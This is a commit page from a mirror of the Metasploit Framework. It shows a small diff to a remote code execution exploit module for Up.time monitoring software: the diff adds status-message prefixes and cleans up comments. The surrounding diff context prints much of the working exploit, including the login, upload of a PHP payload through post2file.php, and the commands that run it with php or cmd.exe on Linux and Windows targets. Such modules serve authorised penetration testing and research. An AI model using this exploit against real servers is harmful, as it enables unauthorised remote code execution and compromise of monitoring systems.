infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Change print_*

bug/bundler_fix
wchen-r7 2015-10-23 16:27:52 -05:00
parent 3c961f61a7
commit 01c2641c6b
1 changed files with 17 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
modules/exploits/multi/http/uptime_code_exec.rb
View File

@ -54,6 +54,18 @@ class Metasploit4 < Msf::Exploit::Remote
], self.class) ], self.class)
end end
def print_status(msg='')
super("#{rhost}:#{rport} - #{msg}")
end
def print_error(msg='')
super("#{rhost}:#{rport} - #{msg}")
end
def print_good(msg='')
super("#{rhost}:#{rport} - #{msg}")
end
# Application Check # Application Check
def check def check
res = send_request_cgi( res = send_request_cgi(
@ -170,7 +182,7 @@ class Metasploit4 < Msf::Exploit::Remote
def exploit def exploit
vprint_status('Trying to login...') vprint_status('Trying to login...')
# #Application Login # Application Login
res_auth = send_request_cgi( res_auth = send_request_cgi(
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'), 'uri' => normalize_uri(target_uri.path, 'index.php'),
@ -179,13 +191,13 @@ class Metasploit4 < Msf::Exploit::Remote
'password' => datastore['PASSWORD'] 'password' => datastore['PASSWORD']
}) })
# #Check OS # # Check OS
phpfile_name = rand_text_alpha(10) phpfile_name = rand_text_alpha(10)
if res_auth && res_auth.headers['Server'] =~ /Unix/ if res_auth && res_auth.headers['Server'] =~ /Unix/
vprint_status('Found Linux installation - Setting appropriated PATH') vprint_status('Found Linux installation - Setting appropriated PATH')
phppath = '/usr/local/uptime/apache/bin/php' phppath = '/usr/local/uptime/apache/bin/php'
uploadpath = '/usr/local/uptime/GUI/wizards' uploadpath = '/usr/local/uptime/GUI/wizards'
## cmdargs = uploadpath + '/' + phpfile_name + '.txt'
cmdargs = "#{uploadpath}#{phpfile_name}.txt" cmdargs = "#{uploadpath}#{phpfile_name}.txt"
cmd = phppath cmd = phppath
else else
@ -193,7 +205,6 @@ class Metasploit4 < Msf::Exploit::Remote
phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe' phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe'
uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards\\' uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards\\'
cmd = 'c:\\windows\\system32\\cmd.exe' cmd = 'c:\\windows\\system32\\cmd.exe'
## cmdargs = '/K "' + '"' + phppath + '" ' + '"' + uploadpath + '\\' + phpfile_name + '.txt' + '"' + '"'
cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\"" cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
end end
@ -294,7 +305,6 @@ class Metasploit4 < Msf::Exploit::Remote
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'), 'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
'vars_post' => { 'vars_post' => {
## 'file_name' => phpfile_name + '.txt',
'file_name' => "#{phpfile_name}.txt", 'file_name' => "#{phpfile_name}.txt",
'script' => payload.encoded 'script' => payload.encoded
} }
@ -312,7 +322,7 @@ class Metasploit4 < Msf::Exploit::Remote
print_error('File not found') print_error('File not found')
end end
# #Get Monitor ID # Get Monitor ID
vprint_status('Fetching Monitor ID...') vprint_status('Fetching Monitor ID...')
res_mon_id = send_request_cgi( res_mon_id = send_request_cgi(
@ -343,7 +353,7 @@ class Metasploit4 < Msf::Exploit::Remote
} }
) )
else else
print_error("#{peer} - Cookie not found") print_error('Cookie not found')
end end
end end
end end